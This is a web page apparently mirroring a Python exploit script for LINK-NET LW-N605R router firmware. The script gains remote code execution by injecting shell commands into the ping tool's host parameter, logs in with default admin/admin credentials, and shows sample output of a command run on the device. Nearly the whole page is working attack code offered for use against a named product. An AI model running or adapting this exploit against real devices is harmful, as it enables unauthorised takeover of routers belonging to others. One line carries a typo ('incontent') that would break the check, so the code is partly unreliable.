扫码分享
验证:
体验盒子|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 135 136 137 138 139 140 141 142 143 144 145 146 147 |
# Title: LW-N605R 12.20.2.1486 - Remote Code Execution # Date: 2018-09-09 # Author: Nassim Asrir # Vendor: LINK-NET # Product Link: http://linknet-usa.com/main/product_info.php?products_id=35&language=es # Firmware version: 12.20.2.1486 # CVE: N/A # Description: LW-N605R devices allow Remote Code Execution via shell metacharacters in the # HOST field of the ping feature at adm/systools.asp. # Authentication is needed but the default password of admin for the admin # account may be used in some cases. # Example: # [root@parrot]─[/home/sniperpex/Desktop] # #python ./blue.py -t http://host/ -c ls -u admin -p admin ''' _ _____ ______________ ______ _ _ | |\ \/ / | \ | |/ /_/ _ \| ___||_ \ | ____|____ __ | | ___ (_) |_ | | \ \ /\ / /____|\| | '_ \| | | |___ \| |_) ||_| \ \/ / '_ \| |/ _ \| | __| | |__\ VV /_____| |\| (_) | |_| |___) |_ < | |___ ><| |_) | | (_) | | |_ |_____\_/\_/|_| \_|\___/ \___/|____/|_| \_\|_____/_/\_\ .__/|_|\___/|_|\__| |_| @AsrirNassim [+] Connection in progress... [+] Authentication in progress... [+] Username & Password: OK [+] Checking for vulnerability... [!] Command "ls": was executed! var usr tmp sys sbin proc mnt media lib init home etc_ro etc dev bin ''' import urllib2 import base64 import optparse import sys import bs4 banner = """ _ _____ ______________ ______ _ _ | |\ \/ / | \ | |/ /_/ _ \| ___||_ \ | ____|____ __ | | ___ (_) |_ | | \ \ /\ / /____|\| | '_ \| | | |___ \| |_) ||_| \ \/ / '_ \| |/ _ \| | __| | |__\ VV /_____| |\| (_) | |_| |___) |_ < | |___ ><| |_) | | (_) | | |_ |_____\_/\_/|_| \_|\___/ \___/|____/|_| \_\|_____/_/\_\ .__/|_|\___/|_|\__| |_| @AsrirNassim """ # Check url def checkurl(url): if url[:8] != "https://" and url[:7] != "http://": print('[X] You must insert http:// or https:// procotol') sys.exit(1) else: return url+"/goform/sysTools" def connectionScan(url,user,pwd,cmd): print '[+] Connection in progress...' try: response = urllib2.Request(url) content = urllib2.urlopen(response) print '[X] LW-N605R Authentication not found' except urllib2.HTTPError, e: if e.code == 404: print '[X] Page not found' elif e.code == 401: try: print '[+] Authentication in progress...' base64string = base64.encodestring('%s:%s' % (user, pwd)).replace('\n', '') response = urllib2.Request(url+"/goform/sysTools?tool=0&pingCount=4&host=127.0.0.1;"+cmd+"&sumbit=OK", None) response.add_header("Authorization", "Basic %s" % base64string) content = urllib2.urlopen(response).read() if "putmsg(mPingCount);" in content: print '[+] Username & Password: OK' print '[+] Checking for vulnerability...' if 'e' incontent: print '[!] Command "'+cmd+'": was executed!' else: print '[X] Not Vulnerable :(' else: print '[X] No LW-N605R page found' soup = bs4.BeautifulSoup(content, 'html.parser') for textarea in soup.find_all('textarea'): print textarea.get_text() except urllib2.HTTPError, e: if e.code == 401: print '[X] Wrong username or password' else: print '[X] HTTP Error: '+str(e.code) except urllib2.URLError: print '[X] Connection Error' else: print '[X] HTTP Error: '+str(e.code) except urllib2.URLError: print '[X] Connection Error' commandList = optparse.OptionParser('usage: %prog -t https://target:444/ -u admin -p pwd -c "ls"') commandList.add_option('-t', '--target', action="store", help="Insert TARGET URL", ) commandList.add_option('-c', '--cmd', action="store", help="Insert command name", ) commandList.add_option('-u', '--user', action="store", help="Insert username", ) commandList.add_option('-p', '--pwd', action="store", help="Insert password", ) options, remainder = commandList.parse_args() # Check args if not options.target or not options.cmd or not options.user or not options.pwd: print(banner) commandList.print_help() sys.exit(1) print(banner) url = checkurl(options.target) cmd = options.cmd user = options.user pwd = options.pwd connectionScan(url,user,pwd,cmd) |
体验盒子
